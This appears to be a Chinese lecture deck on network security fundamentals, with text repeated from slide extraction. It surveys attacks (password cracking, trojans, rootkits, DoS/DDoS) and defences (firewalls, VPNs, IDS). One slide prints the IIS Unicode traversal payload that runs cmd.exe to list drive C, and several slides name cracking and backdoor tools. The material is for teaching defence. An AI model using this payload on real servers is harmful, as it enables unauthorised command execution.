计算机网络安全基础分解课件

一、网络安全概述二、网络服务的安全问题三、常见黑客攻击手段四、企业网中可以选择的安全技术五、网络安全防范策略网络安全技术基础10/15/2022一、网络安全概述网络安全技术基础10/11/2022一、网络安全概述10/15/202210/11/2022复杂程度InternetEmailWeb浏览Intranet站点电子商务电子政务电子交易时间INTERNET技术及应用的飞速发展10/15/2022复杂程度InternetEmailWeb浏览Intran网络发展的现状不断增加的新应用不断加入的网络互联网的广泛应用人员安全意识不足10/15/2022网络发展的现状不断增加的新应用10/11/2022

网络的攻击事件报道（1）据联邦调查局统计，美国每年因网络安全造成的损失高达75亿美元。据美国金融时报报道，世界上平均每20秒就发生一次入侵国际互联网络的计算机安全事件，三分之一的防火墙被突破。美国联邦调查局计算机犯罪组负责人吉姆•塞特尔称：给我精选10名“黑客”，组成个小组，90天内我将使美国趴下。10/15/2022网络的攻击事件报道（1）据联邦调查局统计，美国每年因网络安

网络的攻击事件报道（2）在海湾战争中，美国特工人员在安曼将伊拉克从德国进口的一批计算机打印设备中换上含有可控“计算机病毒”的芯片，导致伊方的计算机系统在战争初期就陷入全面瘫痪。美国已生产出第一代采用“病毒固化”技术的芯片，并开始嵌入出口的计算机产品中。一旦需要，便可遥控激活。2000年2月，Yahoo受到攻击。“黑客”所采用的攻击方法为分布式DoS攻击。2000年3月8日：山西日报国际互联网站遭到黑客数次攻击被迫关机，这是国内首例黑客攻击省级党报网站事件。2003年11月，Microsoft公司遭到来自俄罗斯的“黑客”袭击，据称造成部分源代码丢失。2003年著名的游戏公司Sierra开发的反恐精英2在未上市之前源代码被黑客从网路窃走。10/15/2022网络的攻击事件报道（2）在海湾战争中，美国特工人员在1980 19851990 1995 20012003时间（年）高各种攻击者的综合威胁程度低对攻击者技术知识和技巧的要求黑客攻击越来越容易实现，威胁程度越来越高信息网络系统的复杂性增加脆弱性程度网络系统日益复杂，安全隐患急剧增加网络的攻击事件报道（3）10/15/20221980 19851990 1995

网络存在的威胁操作系统本身的安全漏洞；防火墙存在安全缺陷和规则配置不合理；来自内部网用户的安全威胁;

缺乏有效的手段监视、评估网络的安全性；TCP/IP协议族软件本身缺乏安全性；电子邮件病毒、Web页面中存在恶意的Java/ActiveX控件；

应用服务的访问控制、安全设计存在漏洞。线路窃听。指利用通信介质的电磁泄漏或搭线窃听等手段获取非法信息。10/15/2022网络存在的威胁操作系统本身的安全漏洞；10/11/202

信息安全的基本特征（1）相对性只有相对的安全，没有绝对的安全系统。操作系统与网络管理的相对性。安全性在系统的不同部件间可以转移（如在内部网络和外部网络之间使用堡垒主机）。10/15/2022信息安全的基本特征（1）相对性10/11/2022信息安全的基本特征（2）时效性新的漏洞与攻击方法不断发现（NT4.0已从SP1发展到SP6，Windows2000业发现很多漏洞，针对Outlook的病毒攻击非常普遍）配置相关性日常管理中的不同配置会引入新的问题（安全测评只证明特定环境与特定配置下的安全）新的系统部件会引入新的问题（新的设备的引入、防火墙配置的修改）10/15/2022信息安全的基本特征（2）时效性10/11/2022信息安全的基本特征（3）攻击的不确定性攻击发起的时间、攻击者、攻击目标和攻击发起的地点都具有不确定性复杂性：信息安全是一项系统工程，需要技术的和非技术的手段，涉及到安全管理、教育、培训、立法、国际合作与互不侵犯协定、应急反应等10/15/2022信息安全的基本特征（3）攻击的不确定性10/11/2022网络安全层次层次一：物理环境的安全性（物理层安全）层次二：操作系统的安全性（系统层安全）层次三：网络的安全性（网络层安全）层次四：应用的安全性（应用层安全）层次五：管理的安全性（管理层安全）10/15/2022网络安全层次层次一：物理环境的安全性（物理层安全）10/11存在安全漏洞原因网络设备种类繁多访问方式的多样化网络的不断变化用户安全专业知识的缺乏10/15/2022存在安全漏洞原因网络设备种类繁多访问方式的多样化10/11/网络服务的安全问题10/15/2022网络服务的安全问题10/11/2022电子邮件的安全问题UNIX平台上常用的邮件服务器sendmail常以root帐号运行，存在潜在的危险；角色欺骗：电子邮件上的地址是可以假冒的；窃听：电子邮件的题头和内容是用明文传送的，所以内容在传送过程中可能被他人偷看或修改；电子邮件炸弹：被攻击的计算机被电子邮件所淹没直到系统崩溃；针对电子邮件的病毒大量涌现。10/15/2022电子邮件的安全问题UNIX平台上常用的邮件服务器sendmaFTP文件传输的安全问题多数FTP服务器可以用anonymous用户名登录，这样存在让用户破坏系统和文件可能。上载的软件可能有破坏性，大量上载的文件会耗费机时及磁盘空间。建立匿名服务器时，应当确保用户不能访问系统的重要部分，尤其是包含系统配置信息的文件目录。注意不要让用户获得SHELL级的用户访问权限。普通文件传输协议（TFTP）支持无认证操作，应屏蔽掉。10/15/2022FTP文件传输的安全问题多数FTP服务器可以用anonymoTelnet服务和WWW的安全问题Telnet登录时要输入帐号和密码，但帐号和密码是以明文方式传输的，易被监听到。SSH(SecureShell)Web浏览器和服务器难以保证安全。Web浏览器比FTP更易于传送和执行正常的程序，所以它也更易于传送和执行病毒程序。服务器端的安全问题主要来自于CGI（公共网关接口）程序，网上很多的CGI程序并不是由有经验、了解系统安全的程序员编写的，所以存在着大量的安全漏洞。JavaScript,JavaApplet,ActiveX都会带来安全问题10/15/2022Telnet服务和WWW的安全问题Telnet登录时要输入网络管理服务及NFS的安全问题Ping、traceroute/tracert经常被用来测试网络上的计算机，以此作为攻击计算机的最初的手段。简单网络管理协议（SNMP）可以用来集中管理网络上的设备，SNMP的安全问题是别人可能控制并重新配置你的网络设备以达到危险的目的：取消数据包过滤功能、改变路径、废弃网络设备的配置文件等。NFS可以让你使用远程文件系统，不恰当的配置NFS，侵袭者可以很容易用NFS安装你的文件系统。NFS使用的是主机认证，黑客可以冒充合法的主机。10/15/2022网络管理服务及NFS的安全问题Ping、traceroute黑客常见攻击手段10/15/2022黑客常见攻击手段10/11/2022主要内容日益增长的网络安全威胁状况常见的网络攻击方式解析口令攻击特洛伊木马网络监听sniffer扫描器病毒技术拒绝服务攻击(DDOS)10/15/2022主要内容日益增长的网络安全威胁状况10/11/2022日益增长的网络安全威胁10/15/2022日益增长的网络安全威胁10/11/2022日益增长的网络安全威胁

黑客和病毒技术的统一自动，智能，普及,分布,大范围

黑客文化:从个人目的到政治，社会，军事，工业等目的10/15/2022日益增长的网络安全威胁黑客和病毒技术的统一10/11/20

网络内部、外部泄密拒绝服务攻击逻辑炸弹特洛伊木马黑客攻击计算机病毒信息丢失、篡改、销毁蠕虫常见的黑客攻击方式10/15/2022网络内部、外部泄密拒绝服务攻击逻辑炸弹特洛伊木马黑客攻击计常见网络攻击方式口令攻击特洛伊木马网络监听sniffer扫描器病毒技术拒绝服务攻击(DDOS)10/15/2022常见网络攻击方式口令攻击10/11/2022口令攻击口令攻击类型字典攻击强行攻击组合攻击其他攻击类型社会工程学偷窥搜索垃圾箱10/15/2022口令攻击口令攻击类型10/11/2022实施入侵（9）口令攻击工具Windows下常见的工具L0phtcrackNTSweepNTCrackPWDump2CainUnix下常见的工具CrackJohntheRipperSlurpie10/15/2022实施入侵（9）口令攻击工具Windows下常见的工具Uni特洛伊木马（1）特洛伊木马简单地说，特洛伊木马就是攻击者再次进入网络或者是系统而不被发现的隐蔽通道。10/15/2022特洛伊木马（1）特洛伊木马10/11/2022特洛伊木马（2）在大多数情况下，攻击者入侵一个系统后，他可能还想在适当的时候再次进入系统。比如说，如果攻击者入侵了一个站点，将它作为一个对其他系统进行攻击的平台或者是跳板，他就会想在适当的时候登录到这个站点取回他以前存放在系统里面的工具进行新的攻击。很容易想到的方法就是在这个已经被入侵的系统中留一个特洛依木马。10/15/2022特洛伊木马（2）在大多数情况下，攻击者入侵一个系统后，他可特洛伊木马（3）木马程序举例QAZQAZ是一个典型的通过电子邮件传送的特洛伊木马程序。它通常隐藏在notepad.exe程序中。木马监听代理木马监听程序在受害者系统中打开一个端口并且对所有试图与这个端口相连接的行为进行监听。当有人通过这个端口进行连接时，它要么运行一个三方程序，要么将命令发送给攻击者。NetcatTiniRootkit10/15/2022特洛伊木马（3）木马程序举例10/11/2022特洛伊木马（4）关于RootkitRootkit对于UNIX系统来说是相当普遍的，NT系统的也有。和它的名字正好相反，这种工具并不能使我们获得ROOT权限，但是当一个攻击者已经获得了ROOT的身份后，它就能使攻击者在任何时候都可以以ROOT身份登录到系统。它们经常采用的方法是将自己隐藏在一些重要的文件里。Rootkit有两个主要的类型：文件级别系统级别

10/15/2022特洛伊木马（4）关于Rootkit10/11/2022特洛伊木马（5）文件级别Rootkit威力很强大，可以轻而易举地在系统中建立后门。最一般的情况就是它们首先进入系统然后修改系统的重要文件来达到隐藏自己的目的。合法的文件被木马程序替代。通常情况下，合法的程序变成了外壳程序，而其内部就是隐藏着的后门程序。下面列出的程序就是经常被木马程序利用掩护自己的UNIXRootkit。LOGINLSPSFINDWHONETSTAT10/15/2022特洛伊木马（5）文件级别10/11/2022特洛伊木马（6）系统级别（内核级）对于工作在文件级的Rootkit来说，它们非常容易被检测到。而内核级Rootkit工作在一个很低的级别上--内核级。它们经常依附在内核上，并没有修改系统的任何文件，于是tripwire工具就不能检测到它的使用。因为它并没有对系统的任何文件进行修改，攻击者可以对系统为所欲为而不被发现。系统级Rootkit为攻击者提供了很大的便利，并且修复了文件级Rootkit的一些错误。10/15/2022特洛伊木马（6）系统级别（内核级）10/11/2022特洛伊木马（7）Unix下常见的后门程序文件级RootkitTrojanITLrk5ArkRootkitTK内核级KnarkAdore10/15/2022特洛伊木马（7）Unix下常见的后门程序10/11/2022特洛伊木马（8）Windows下常见的后门程序BrownOrificeDonaldDickSubSevenBackOrifice广外女生黑暗天使冰河灰鸽子流莺10/15/2022特洛伊木马（8）Windows下常见的后门程序10/11/2特洛伊木（9）木马的清除：TheCleaner杀毒软件手动清除木马的防范：不要下载和执行来历不明的程序10/15/2022特洛伊木（9）木马的清除：10/11/2022网络监听网络监听的作用：可以截获用户口令；可以截获秘密的或专用的信息；可以用来攻击相邻的网络；可以对数据包进行详细的分析；可以分析出目标主机采用了哪些协议10/15/2022网络监听网络监听的作用：10/11/2022常用网络监听工具工具名称操作系统功能简介SniffitSunOS,Solaris针对TCP/IP协议的不安全性进行监听TcpdumpUnix,FreeBSD可以从以太网上监听并截获数据包nfswatchHP/UX,SunOS监控在以太网上传输的NFS数据包ethermanSGIIrix监听以太网上的通信SnoopSunOS,Solaris用来侦听本网段数据包，常用作错误诊断NetstatUNIX、WinNT显示当前的TCP/IP连接和协议统计etherfindSunOS监听局域网上的通信的主机LanwatchDOS监听外部主机对本机的访问10/15/2022常用网络监听工具工具名称操作系统功能简介SniffitSun扫描器定义：自动检测本地或远程主机安全弱点的程序功能：帮助发现弱点而不是用来攻击系统分类：本地扫描器和网络扫描器；端口扫描器和漏洞扫描器常见扫描器：如ISS(InternetSecurityScanner,Internet安全扫描程序），SATAN(SecurityAnalysisToolforAuditingNetworks，审计网络用的安全分析工具），NESSUS等可以对整个域或子网进行扫描并寻找安全上的漏洞这些程序能够针对不同系统的脆弱性确定其弱点。入侵者利用扫描收集来的信息去获得对目标系统的非法访问权。10/15/2022扫描器定义：自动检测本地或远程主机安全弱点的程序10/11/国际互联网络服务器服务器防火墙其它网络广域网电话网企业网内域网互联网扫描器10/15/2022国际互联网络服务器服务器防火墙其它网络广域网电话网企业网内域拒绝服务攻击DoS攻击LANDTeardrop,SYNfloodICMP:smurfRouter:remotereset,UDPport7,Windows:Port135,137,139(OOB),terminalserverSolaris:Linux:其他...

10/15/2022拒绝服务攻击DoS攻击10/11/2022攻击者InternetCode目标2欺骗性的IP包源地址2Port139目的地址2Port139TCPOpenG.MarkHardy拒绝服务攻击:LAND攻击10/15/2022攻击者InternetCode目标欺骗性的IP包G.M攻击者InternetCode目标2IP包欺骗源地址2Port139目的地址2Port139包被送回它自己崩溃G.MarkHardy拒绝服务攻击:

LAND攻击10/15/2022攻击者InternetCode目标IP包欺骗崩溃G.Ma攻击者InternetCode目标2IP包欺骗源地址2Port139目标地址2Port139TCPOpen防火墙防火墙把有危险的包阻隔在网络外G.MarkHardy拒绝服务攻击:代理防火墙的保护10/15/2022攻击者InternetCode目标IP包欺骗防火墙防火墙把有攻击者InternetCode目标欺骗性的IP包源地址不存在目标地址是TCPOpenG.MarkHardy拒绝服务攻击:SYNFLOOD10/15/2022攻击者InternetCode目标欺骗性的IP包G.M攻击者InternetCode目标同步应答响应源地址目标地址不存在TCPACK崩溃G.MarkHardy拒绝服务攻击:SYNFLOOD10/15/2022攻击者InternetCode目标同步应答响应崩溃G.MaSmuff攻击示意图第一步：攻击者向被利用网络A的广播地址发送一个ICMP协议的’echo’请求数据报，该数据报源地址被伪造成第二步：网络A上的所有主机都向该伪造的源地址返回一个‘echo’响应，造成该主机服务中断。拒绝服务攻击:Smurf10/15/2022Smuff攻击示意图第一步：攻击者向被利用网络A的广播地址发分布式拒绝服务（DDOS）以破坏系统或网络的可用性为目标常用的工具：Trin00,TFN/TFN2K,Stacheldraht很难防范伪造源地址，流量加密，因此很难跟踪clienttargethandler...agent...DoSICMPFlood/SYNFlood/UDPFlood10/15/2022分布式拒绝服务（DDOS）以破坏系统或网络的可用性为目标clDDoS的结构10/15/2022DDoS的结构10/11/2022分布式拒绝服务攻击步骤（1）ScanningProgram不安全的计算机Hacker攻击者使用扫描工具探测扫描大量主机以寻找潜在入侵目标。1Internet10/15/2022分布式拒绝服务攻击步骤（1）Scanning不安全的计算机HHacker被控制的计算机(代理端)黑客设法入侵有安全漏洞的主机并获取控制权。这些主机将被用于放置后门、sniffer或守护程序甚至是客户程序。2Internet分布式拒绝服务攻击步骤（2）10/15/2022Hacker被控制的计算机(代理端)2Internet分布式Hacker

黑客在得到入侵计算机清单后，从中选出满足建立网络所需要的主机，放置已编译好的守护程序，并对被控制的计算机发送命令。3被控制计算机（代理端）MasterServerInternet分布式拒绝服务攻击步骤（3）10/15/2022Hacker3被控制计算机（代理端）MasteHackerUsingClientprogram,

黑客发送控制命令给主机，准备启动对目标系统的攻击4被控制计算机（代理端）TargetedSystemMasterServer分布式拒绝服务攻击步骤4Internet分布式拒绝服务攻击步骤（4）10/15/2022HackerUsingClientprogInternetHacker

主机发送攻击信号给被控制计算机开始对目标系统发起攻击。5MasterServerTargetedSystem被控制计算机（代理端）分布式拒绝服务攻击步骤（5）10/15/2022InternetHacker5MasterTargTargetedSystemHacker

目标系统被无数的伪造的请求所淹没，从而无法对合法用户进行响应，DDOS攻击成功。6MasterServerUserRequestDeniedInternet被控制计算机（代理端）分布式拒绝服务攻击步骤（6）10/15/2022TargetedHacker目标系统被无数的伪DDOS攻击的效果由于整个过程是自动化的，攻击者能够在5秒钟内入侵一台主机并安装攻击工具。也就是说，在短短的一小时内可以入侵数千台主机。并使某一台主机可能要遭受1000MB/S数据量的猛烈攻击，这一数据量相当于1.04亿人同时拨打某公司的一部电话号码。分布式拒绝服务攻击10/15/2022DDOS攻击的效果分布式拒绝服务攻击10/11/2022分布式拒绝服务攻击的今后的发展趋势：如何增强自身的隐蔽性和攻击能力；采用加密通讯通道、ICMP协议等方法避开防火墙的检测；采用对自身进行数字签名等方法研究自毁机制，在被非攻击者自己使用时自行消毁拒绝服务攻击数据包，以消除证据。分布式拒绝服务攻击的发展趋势10/15/2022分布式拒绝服务攻击的今后的发展趋势：分布式拒绝服务攻击的发展预防DDOS攻击的措施确保主机不被入侵且是安全的；周期性审核系统；检查文件完整性；优化路由和网络结构；优化对外开放访问的主机；在网络上建立一个过滤器（filter）或侦测器（sniffer），在攻击信息到达网站服务器之前阻挡攻击信息。预防DDOS攻击的措施10/15/2022预防DDOS攻击的措施预防DDOS攻击的措施10/11/20计算机病毒计算机病毒带来的危害2003年，计算机病毒不仅导致人们支付了数十亿美元的费用，而且还动摇了互联网的中枢神经。从今年1月份的Slammer攻击事件到8月份的“冲击波”病毒，都给互联网带来了不小的破坏。2004年上半年又出现将近4000种病毒目前世界上共有8万多种病毒，但是大部分都为“动物园”里的老病毒，这些病毒很少传播，还在“野外”的病毒有2000多种，较为流行的病毒有200多种，其中以蠕虫病毒传播最为广泛。10/15/2022计算机病毒计算机病毒带来的危害10/11/2022

中文IIS4.0+SP6中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，UNICODE编码存在BUG，在UNICODE编码中

%c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘

%c0%2f-〉(0xc0-0xc0)*0x40+0x2f=0x2f=‘＼‘

NT4中/编码为%c1%9c

在英文版里：WIN2000英文版%c0%af

还有以下的编码可以实现对该漏洞的检测.

%c1%pc

%c0%9v

%c0%qf

%c1%8s

27/scripts/..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dirc:\黑客攻击范例－UNICODE漏洞的利用

10/15/2022

中文IIS4.0+SP6中文WIN2000+IIS黑客攻击范例－UNICODE漏洞的利用10/15/2022黑客攻击范例－UNICODE漏洞的利用10/11/2022黑客攻击范例－UNICODE漏洞的利用10/15/2022黑客攻击范例－UNICODE漏洞的利用10/11/2022企业网中可以选择的安全技术10/15/2022企业网中可以选择的安全技术10/11/2022主要内容防火墙技术加密技术VPN技术入侵检测技术防病毒技术网络扫描技术10/15/2022主要内容防火墙技术10/11/2022ServerClient

防火墙（Firewall）注解：防火墙类似一堵城墙，将服务器与客户主机进行物理隔离，并在此基础上实现服务器与客户主机之间的授权互访、互通等功能。防火墙是一个位于计算机与网络或网络与网络之间的软件或硬件设备或是软硬件结合10/15/2022ServerClient防火墙（Firewall）注解：防一种高级访问控制设备，置于不同网络安全域之间的一系列部件的组合，它是不同网络安全域间通信流的唯一通道，能根据企业有关的安全政策控制（允许、拒绝、监视、记录）进出网络的访问行为。两个安全域之间通信流的唯一通道安全域1HostAHostB安全域2HostCHostDUDPBlockHostCHostBTCPPassHostCHostADestinationProtocolPermitSource根据访问控制规则决定进出网络的行为防火墙10/15/2022一种高级访问控制设备，置于不同网络安全域之间的一系列部件的组防火墙的目的确保内部网向外部网的全功能互联和内部网的安全；所有内部网络与外部网的信息交流必须经过防火墙；只有按本地的安全策略被授权的信息才允许通过；防火墙本身具有防止被穿透的能力。10/15/2022防火墙的目的10/11/2022防火墙的作用过滤进出网络的数据包管理进出网络的访问行为封堵某些禁止的访问行为记录通过防火墙的信息内容和活动对网络攻击进行检测和告警10/15/2022防火墙的作用过滤进出网络的数据包10/11/2022防火墙结构双主机防火墙主机屏蔽防火墙子网屏蔽防火墙10/15/2022防火墙结构双主机防火墙10/11/2022双主机防火墙你的网络internet双网卡主机1、必须使主机的路由功能无效。2、双主机防火墙是运行一组应用层代理软件或链路层代理软件来工作的缺点：用户很容易意外地使内部路由有效10/15/2022双主机防火墙你的网络internet双网卡主机1、必须使主机主机屏蔽防火墙你的网络internet路由器主机屏蔽防火墙10/15/2022主机屏蔽防火墙你的网络internet路由器主机屏蔽防火墙1子网屏蔽防火墙你的网络internet路由器子网屏蔽防火墙路由器10/15/2022子网屏蔽防火墙你的网络internet路由器子网屏蔽防火墙路防火墙技术包过滤技术代理技术状态检查技术 地址翻译技术 安全审计技术 安全内核技术 负载平衡技术内容安全技术10/15/2022防火墙技术包过滤技术10/11/2022防火墙的局限%c1%1c%c1%1cDirc:\10/15/2022防火墙的局限%c1%1c%c1%1cDirc:\10/防火墙的局限确保网络的安全,就要对网络内部进行实时的检测,这就需要IDS无时不在的防护！防火墙不能防止通向站点的后门。防火墙一般不提供对内部的保护。防火墙无法防范数据驱动型的攻击。防火墙不能防止用户由Internet上下载被病毒感染的计算机程序或者将该类程序附在电子邮件上传输10/15/2022防火墙的局限确保网络的安全,就要对网络内部进行实时的检测数据加密技术加密系统的组成部分密码分类数字签名近代加密技术加密技术的实现PGP加密软件10/15/2022数据加密技术加密系统的组成部分10/11/2022加密系统的组成部分（1）未加密的报文，也称明文。（2）加密后的报文，也称密文。（3）加密解密设备或算法。（4）加密解密的密钥密钥：是用户按照一种密码体制随机选取，它通常是一随机字符串，是控制明文和密文变换10/15/2022加密系统的组成部分（1）未加密的报文，也称明文。密钥：是用户密码分类按应用技术或历史发展阶段划分手工密码、机械密码、电子机内乱密码、计算机密码按保密程度划分理论上保密的密码、实际上保密的密码、不保密的密码按密钥方式划分对称密钥密码、非对称式密码按明文形态模拟型密码、数字型密码按编制原理划分移位、代替、置换10/15/2022密码分类按应用技术或历史发展阶段划分10/11/2022对称密钥加密技术安全性依赖于：加密算法足够强，加密方法的安全性依赖于密钥的秘密性，而不是算法。特点：（1）收发双方使用相同密钥 的密码（2）密钥的分发和管理非常 复杂、代价昂贵。（3）不能实现数字签名用来加密大量的数据10/15/2022对称密钥加密技术安全性依赖于：加密算法足够强，加密方法的安全公有密钥加密技术加密关键性的、核心的机密数据加密系统的组成部分公有密钥和私有密钥的使用规则（1）密钥成对使用（2）公钥可以给任何人，而私钥自己保留（3）从现实环境下，不可能从公有密钥推导出私有密钥特点：（1）密钥的分配和管理简单。（2）容易实现数字签名，最适合于电子商务应用。（3）安全性更高，计算非常复杂，实现速度远赶不上对称密钥加 密系统10/15/2022公有密钥加密技术加密关键性的、核心的机密数据加密系统的组成部数字签名原理：将要传送的明文通过一种函数运算（HASH）转换成报文摘要，报文摘要加密后与明文一起传送给按受方，接受方将接受的明文产生新的报文摘要与发送方的发来的摘要解密比较，比较结果一致表示明文未被改动，如果不一致明文已篡改。10/15/2022数字签名原理：10/11/2022数字签名

10/15/2022数字签名10/11/2022VPN即虚拟专用网，是指一些节点通过一个公用网络（通常是因特网）建立的一个临时的、安全的连接，它们之间的通信的机密性和完整性可以通过某些安全机制的实施得到保证特征虚拟(V)：并不实际存在，而是利用现有网络，通过资源配置以及虚电路的建立而构成的虚拟网络专用(P)：只有企业自己的用户才可以联入企业自己的网络网络(N)：既可以让客户连接到公网所能够到达的任何地方，也可以方便地解决保密性、安全性、可管理性等问题，降低网络的使用成本VPN技术10/15/2022VPN即虚拟专用网，是指一些节点通过一个公用网络（通常是因特VPN的用途VPN（虚拟专用网络）是通过公共介质如Internet扩展公司的网络VPN可以加密传输的数据，保障数据的机密性、完整性、真实性防火墙是用来保证内部网络不被侵犯，相当于银行的门卫；而VPN则是保证在网络上传输的数据不被窃取，相当于运钞车。10/15/2022VPN的用途VPN（虚拟专用网络）是通过公共介质如InterVPN的隧道协议

VPN的关键技术在于通信隧道的建立，数据包通过通信隧道进行封装后的传送以确保其机密性和完整性通常使用的方法有：使用点到点隧道协议PPTP、第二层隧道协议L2TP、第二层转发协议L2F等在数据链路层对数据实行封装使用IP安全协议IPSec在网络层实现数据封装使用介于第二层和第三层之间的隧道协议，如MPLS隧道协议10/15/2022VPN的隧道协议VPN的关键技术在于通信隧道的建立，数据包PPTP/L2TP1996年，Microsoft和Ascend等在PPP协议的基础上开发了PPTP，并将它集成于WindowsNTServer4.0中，同时也提供了相应的客户端软件PPTP可把数据包封装在PPP包中，再将整个报文封装在PPTP隧道协议包中，最后，再嵌入IP报文或帧中继或ATM中进行传输PPTP提供流量控制,采用MPPE加密算法10/15/2022PPTP/L2TP1996年，Microsoft和Asce1996年，Cisco提出L2F（Layer2Forwarding）隧道协议1997年底，Micorosoft和Cisco公司把PPTP协议和L2F协议的优点结合在一起，形成了L2TP协议L2TP协议综合了PPTP协议和L2F（Layer2Forwarding）协议的优点,并且支持多路隧道，这样可以使用户同时访问Internet和企业网。L2TP可以实现和企业原有非IP网的兼容，支持MP（MultilinkProtocol），可以把多个物理通道捆绑为单一逻辑信道

PPTP/L2TP10/15/20221996年，Cisco提出L2F（Layer2Forwa优点：支持其他网络协议（如Novell的IPX，NetBEUI和AppleTalk协议

）支持流量控制缺点：通道打开后，源和目的用户身份就不再进行认证，存在安全隐患限制同时最多只能连接255个用户端点用户需要在连接前手工建立加密信道，另外认证和加密受到限制，没有强加密和认证支持。

PPTP和L2TP最适合用于远程访问虚拟专用网。

PPTP/L2TP10/15/2022优点：PPTP/L2TP10/11/2022IPSecVPNIPSec是一种由IETF设计的端到端的确保基于IP通讯的数据安全性的机制。IPSEC支持对数据加密，同时确保数据的完整性。IPSEC使用验证包头（AH，在RFC2402中定义）提供来源验证（sourceauthentication），确保数据的可靠性；IPSec使用封装安全负载（ESP，在RFC1827中定义）进行加密，从而确保数据机密性。在IPSec协议下，只有发送方和接受方知道秘密密钥。如果验证数据有效，接受方就可以知道数据来自真实的发送方，并且在传输过程中没有受到破坏。IPSec有两种应用模式：传送模式和隧道模式10/15/2022IPSecVPNIPSec是一种由IETF设计的端到端的确传输模式：使用原始明文IP头，并且只加密数据，包括它的TCP和UDP头。这种模式适用于小型网络和移动客户端。隧道模式：隧道模式处理整个IP数据包：包括全部TCP/IP或UDP/IP头和数据，它用自己的地址做为源地址加入到新的IP头。隧道模式被用在两端或是一端是安全网关的架构中，例如装有IPSec的防火墙。使用了隧道模式，防火墙内很多主机不需要安装IPSec也能安全地与外界通信，并且还可以提供更多的便利来隐藏内部服务器主机和客户机的地址。IPSecVPN10/15/2022传输模式：IPSecVPN10/11/2022优点：可提供高强度的安全性（数据加密和身份验证）对上层应用完全透明支持网络与网络、用户与用户、网络与用户多种应用模式缺点：只支持IP协议目前防火墙产品中集成的VPN多为使用IPSec协议，在中国其发展处于蓬勃状态。IPSecVPN10/15/2022优点：IPSecVPN10/11/2022MPLSVPN

是在网络路由和交换设备上应用MPLS(MultiprotocolLabelSwitching)技术，简化核心路由器的路由选择方式，利用结合传统路由技术的标记交换实现的IP虚拟专用网络（IPVPN）MPLSVPN主要应用领域是用于建设全网状结构的数据专线，保证局域网互联的带宽与服务质量。总部与下面分支机构互联时，如果使用公网，则带宽、时延等很大程度上受公网的网络状况制约。而布署MPLSVPN后，可以保证网络服务质量，从而保证一些对时延敏感的应用稳定运行，如分布异地的实时交易系统、视频会议、IP电话等等。10/15/2022MPLSVPN是在网络路由和交换设备上应用MPLS(M与其他VPN协议的对比L2TP、PPTP：主要用于客户端接入专用网络。本身的安全性比较弱，需要依靠IPSec来提供进一步的安全性。MPLS：能够提供与传统的ATM，FR同等的安全性，但本身没有加密，认证机制，对数据的机密性等保证需要依靠IPSec来进一步保证。IPSec是弥补其他VPN技术的安全性的有效保证。10/15/2022与其他VPN协议的对比L2TP、PPTP：主要用于客户端接入1100111001010001010010101001000100100100000100000011001110010100010100101010010001001001000001000000明文加密解密明文密文·#￥^&(%#%$%^&*(!#$%*((_%$@#$%%^*&**)%$#@保证数据在传输中的机密性发起方接受方密文·#￥^&(%#%$%^&*(!#$%*((_%$@#$%%^*&**)%$#@支持IKE密钥协商密钥自动刷新128位对称加密1024位非对称加密设备之间采用证书认证支持CA认证VPN的主要作用之一10/15/202211001110011100111001明文加密解密明文密文发起方接受方1001000101010010100001000000110110001010100010101001000101010010100001000000110110001010HashHash100010101001000101010010100001000000110110001010是否一样？验证数据来源的完整性和真实性支持透明模式支持路由模式VPN的主要作用之二10/15/2022发起方接受方100100011000101010010001实时入侵检测系统Internet总部办事处分公司分公司在网络中部署网络入侵检测系统，实时对网络中的数据流进行检测，对于可疑的数据，将及时报警，入侵检测系统同时与防火墙交互信息，共同防范来自于网外的攻击。具体策略如下：基于网络的入侵检测策略基于主机的入侵检测策略报警攻击10/15/2022实时入侵检测系统Internet总部办事处分公司分公司在网什么是入侵检测系统IDS（IntrusionDetectionSystem）就是入侵检测系统，它通过抓取网络上的所有报文，分析处理后，报告异常和重要的数据模式和行为模式，使网络安全管理员清楚地了解网络上发生的事件，并能够采取行动阻止可能的破坏。10/15/2022什么是入侵检测系统IDS（IntrusionDetect什么是入侵检测系统入侵检测系统网络数据包的获取——混杂模式网络数据包的解码——协议分析网络数据包的检查——规则匹配网络数据包的统计——异常检测网络数据包的审查——事件生成10/15/2022什么是入侵检测系统入侵检测系统10/11/2022监控室=控制中心后门保安=防火墙摄像机=探测引擎CardKey形象地说，它就是网络摄象机，能够捕获并记录网络上的所有数据，同时它也是智能摄象机，能够分析网络数据并提炼出可疑的、异常的网络数据，它还是X光摄象机，能够穿透一些巧妙的伪装，抓住实际的内容。它还不仅仅只是摄象机，还包括保安员的摄象机，能够对入侵行为自动地进行反击：阻断连接、关闭道路（与防火墙联动）。什么是入侵检测系统10/15/2022监控室=控制中心后门保安=防火墙摄像机=探测引擎CardK在安全体系中，IDS是唯一一个通过数据和行为模式判断其是否有效的系统，如下图所示，防火墙就象一道门，它可以阻止一类人群的进入，但无法阻止同一类人群中的破坏分子，也不能阻止内部的破坏分子；访问控制系统可以不让低级权限的人做越权工作，但无法保证高级权限的做破坏工作，也无法保证低级权限的人通过非法行为获得高级权限入侵检测系统的作用10/15/2022在安全体系中，IDS是唯一一个通过数据和行为模式判断其是否有入侵检测系统的职责IDS系统的两大职责：实时检测和安全审计。实时监测——实时地监视、分析网络中所有的数据报文，发现并实时处理所捕获的数据报文；安全审计——通过对IDS系统记录的网络事件进行统计分析，发现其中的异常现象，得出系统的安全状态，找出所需要的证据。10/15/2022入侵检测系统的职责IDS系统的两大职责：实时检测和安全审计IntranetIDSAgentIDSAgent网络IDS企业内部典型安装FirewallInternetServersDMZIDSAgent监控中心router10/15/2022IntranetIDSAgentIDSAgent网络IDIDS阻断入侵示意图FirewallInternetServersDMZIDSAgentIntranetIDSAgent监控中心router攻击者攻击者发现攻击发现攻击发现攻击报警报警10/15/2022IDS阻断入侵示意图FirewallInternetSe防病毒技术病毒概述病毒危害病毒新技术防病毒技术清除病毒网络防病毒10/15/2022防病毒技术病毒概述10/11/2022病毒概述《中华人民共和国计算机信息系统安全保护条例》第二十八条中明确指出：“计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我传染的一组计算机指令或者程序代码。”10/15/2022病毒概述《中华人民共和国计算机信息系统安全保护条例》第二十八计算机病毒原理计算机病毒程序病毒引导模块（潜伏机制）病毒传染模块（再生机制）病毒表现模块（激发机制）10/15/2022计算机病毒原理计算机病毒程序病毒引导模块（潜伏机